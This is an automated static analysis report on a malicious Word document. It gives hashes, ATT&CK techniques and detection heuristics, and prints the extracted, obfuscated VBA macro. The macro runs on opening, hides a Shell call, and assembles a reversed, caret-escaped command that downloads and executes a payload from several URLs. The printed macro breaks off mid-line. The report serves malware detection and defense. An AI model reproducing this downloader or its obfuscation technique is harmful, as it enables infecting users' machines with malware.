Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ca71170483f94cc9…

MALICIOUS

Office (OLE)

66.6 KB Created: 2018-09-07 03:15:00 Authoring application: Microsoft Office Word First seen: 2018-10-13
MD5: b84f21b1538a8797e9f8d5bc3a8e7821 SHA-1: 9e420e77da63dbfaf78bdfce3cd6af991586e414 SHA-256: ca71170483f94cc9d5cf385aed5119287d3e5cc4fa19d9c8746dff5938e324b4
182 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic; T1204.002 User Execution: Malicious File

The sample contains a VBA macro that runs automatically when the document is opened, as indicated by the Document_Open heuristic. The macro calls Shell() with vbHide, so the command executes without a visible window. The command string is assembled at run time from the return values of several helper functions, each of which builds its fragment from concatenated substrings and Chr() arithmetic, interleaved with Month() statements whose results are discarded (padding that performs no useful work). The resulting command is obfuscated, but its structure is consistent with a downloader that retrieves and executes a second-stage payload. The ClamAV detection name 'Doc.Malware.Emooodldr-6675034-0' further supports the malicious classification.

Heuristics 5

  • ClamAV: Doc.Malware.Emooodldr-6675034-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Emooodldr-6675034-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — a standard OOXML schema namespace identifier, not a download location

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 5828 bytes
SHA-256: 4e598279d62ea917b5d321ec6669af5391246b4bafa2f8b1d856f5e142e1a708
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "LajRZMILGjICD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On _
Error _
Resume _
Next
Shell Format(vMOCJR) + jwMNuEsSJpvhWi + kmYGzuLhum + hvTzrMfY + ILquw + jvjNjMIn + GnzvuiiniPHabD + VkvNktSXsXz, vbHide
End Sub



Attribute VB_Name = "niSHlzLVqzmoD"
Function hvTzrMfY()

On _
Error _
Resume _
Next
Month "Y" + "nL"
   Month "KQwiXY" + "jLha" + "495492393" + "mlZbAuuX"
   Month "uwuIJk" + "wk" + "fwTjXHqIwoE" + "SOr"
   Month "Udj" + "chfiz"
XuZnLVjq = Chr(9 + 18 + 10 + 11 + 51) + "md " + "/" + "V/" + Chr(6 + 12 + 7 + 8 + 34) + Chr(3 + 5 + 3 + 3 + 20) + "s^" + "e" + "^t NnQ" + "=^ ^ " + " "
Month "167927260" + "sss" + "FwdzOsR" + "60637388"
   Month "fwS" + "GwfBdkwUJ"
   Month "234402143" + "JPbcTj"
   Month "AXb" + "321815865"
cPBXbQjnLC = "^ " + " " + "^ " + "   " + " ^ " + " ^" + " " + "  ^ ^" + " ^}}"
Month "B" + "TIiNnEGP" + "528078450" + "341932877"
   Month "lclvLjEiTE" + "168842790"
GNwqvT = "{" + "h" + Chr(9 + 18 + 10 + 11 + 51) + "t" + "^a" + Chr(9 + 18 + 10 + 11 + 51) + "^}" + ";kae" + "rb;" + "h"
Month "wUU" + "qRGL" + "uUhCuQbTJjoK" + "257676650"
YHapqGi = "ZP^" + "$ ^me^t" + "I-^ek" + "ovn^I;)" + "^" + "h^ZP$ "
Month "132918941" + "40959542"
   Month "137656137" + "aq"
   Month "nFa" + "F" + "ViEzEid" + "Xz"
   Month "stNXiiWUsfPL" + "lcmDzIiwbb"
   Month "fEshh" + "kNwQrQRuAErRt"
QHrkppEHcao = "^,s^o" + "^" + "j^" + "$(^" + "e^liFd" + "aoln^w^" + "o^D" + "^.rV"
Month "n" + "8298"
   Month "FXj" + "spFn"
   Month "6230" + "iVTvKz"
   Month "JhZ" + "GF" + "w" + "Om"
NhwWtvH = "^S" + "^$^{" + "yr^t" + "{)R" + "^" + "h^l$^ " + "ni^ ^s" + "oj^$" + "(^h"
hvTzrMfY = XuZnLVjq + cPBXbQjnLC + GNwqvT + YHapqGi + QHrkppEHcao + NhwWtvH
   Month "kRtwYnu" + "Et"
   Month "i" + "w"
   Month "PtD" + "r" + "NHiTlt" + "S"
End Function
Function ILquw()

On _
Error _
Resume _
Next
Month "vITCzFlMsjRSdV" + "Dn" + "wfAwu" + "Yf"
   Month "224725599" + "4071"
   Month "317271293" + "Ew"
   Month "rOiAk" + "489637980" + "9769" + "424443088"
rZPME = Chr(9 + 18 + 10 + 11 + 51) + "aerof" + "^;^'" + "e^xe.^'" + "^+^fo" + "^O^$+" + "^'\^'^+" + Chr(9 + 18 + 10 + 11 + 51) + "^il^b" + "u^" + "p"
Month "WopmrAAoP" + "czRhcAF"
   Month "146017178" + "5799" + "NLdTkGpBViStzV" + "Qo"
BqMiGb = ":v" + "n^e^$=h" + "ZP$;" + "^" + "'" + "^23^8" + "^"
Month "wu" + "IFsf"
bJHLbh = "'^ " + "^= ^" + "f^" + "o" + "^" + "O^$^" + ";)" + "'@" + "^'(t^i^" + "lpS^.^" + "'" + Chr(6 + 12 + 7 + 8 + 34) + "r^W2" + "G^Z^fa" + "/"
Month "p" + "TsVOrairjAYHaz"
   Month "iulYXUs" + "EfCz"
   Month "500015657" + "tQo" + "408177797" + "368423204"
   Month "zj" + "9058"
ftusShCVzBv = "^sd^" + "ao^l^" + "pu" + "/tnetn" + "o" + Chr(9 + 18 + 10 + 11 + 51) + "^-^" + "p^w/^e" + "k." + Chr(9 + 18 + 10 + 11 + 51) + "a" + "^" + ".i" + "bn^ou.^" + "m^" + "uro"
Month "90962034" + "41743155" + "ENHwOM" + "18663823"
   Month "PBNsz" + "6155" + "hwZDbXFNFTIw" + "YZ"
VNrEvWC = "f" + "ur//^:" + "pt^t^" + "h@0" + Chr(9 + 18 + 10 + 11 + 51)
Month "sTmziAFfJpcZ" + "wlIrLB" + "cAOr" + "342231263"
mKPStQraBFj = "^" + "sAV^" + "p^J05^D" + "/^l" + "n.r^e" + "^z" + "^j^iw" + "^e^b" + "r^a" + "av/" + "/:^"
Month "446443300" + "u"
   Month "286589453" + "7159" + "904" + "SHnzNUYAdFhO"
   Month "166247658" + "249"
   Month "9093" + "7718" + "mY" + "qPEz"
   Month "4165" + "BmM"
   Month "217877221" + "vNPkfzKKw"
Yijkiw = "ptt^h" + "@^YVLs" + "5fQq3^" + "m" + "/" + "mo" + Chr(9 + 18 + 10 + 11 + 51) + "^.e" + "n^o^t" + "^saniv" + "//^:p^" + "t^t^"
Month "1952" + "J" + "7066" + "bvjmwGcpj"
rmwjdtp = "h@" + "^o" + "^pt^EU^" + "fX" + "N^M/"
Month "4319" + "7516" + "kM" + "LIYKqTPMXr"
   Month "6147" + "aA"
zFIRk = "mo" + Chr(9 + 18 + 10 + 11 + 51) + "^.^o" + "^ds^a" + "lp.^www" + "//^:^p" + "^tth" + "^@^Zvy^" + "L^64^iq" + "^0^w/b" + "^al" + "t^se^t" + "/^i^f^" + 
... (truncated)